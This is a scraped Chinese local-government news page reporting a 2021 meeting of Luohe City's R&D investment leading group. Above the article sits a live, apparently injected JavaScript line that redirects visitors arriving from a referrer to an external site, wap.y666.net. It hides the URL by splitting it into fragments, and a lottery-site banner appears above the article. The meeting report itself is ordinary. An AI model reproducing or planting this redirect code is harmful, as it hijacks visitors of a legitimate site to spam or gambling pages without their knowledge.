var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

漯河市全社会研发投入专项工作领导小组召开第一次联席会议


发布日期:2021-10-21 08:59来源:漯河市科学技术局 阅读次数:

  10月12日下午,漯河市全社会研发投入专项工作领导小组第一次联席会议召开,对前一阶段全社会研发投入工作通报情况、发现问题、研判形势、快速行动,确保全年研发投入目标任务落到实处。漯河市政府副秘书长主持会议并作重要讲话。漯河各县区(功能区)、研发投入成员单位分管副职参加会议。

  会上,漯河市科技局党组书记、局长通报了目前全市研发投入总体情况、各部门工作完成进度、工作存在的问题,要求决战50天,11月底前全面完成全年目标任务。漯河各县区(功能区)、漯河市直相关单位进行了工作汇报。

  漯河市政府副秘书长对前段时间各县区、各部门卓有成效的工作予以充分肯定,指出了目前漯河市企业研发、政府投入、产业谋划、新兴产业发展、研发投入统计规范化等方面的问题,并对下步工作提出了“四抓”要求,一是要抓存量,挖掘现有归上企业的科技创新活力。二是要抓重点,做好重点企业、平台建设、项目申报等方面的工作。三是要抓增量,关注新兴产业的项目谋划、专精特新企业的成长发展,激发研发投入新的增长点。四是要抓合力,各县区、部门要有问题及时反馈,由市领导小组统筹协调解决,形成强大工作合力,确保按时完成目标任务。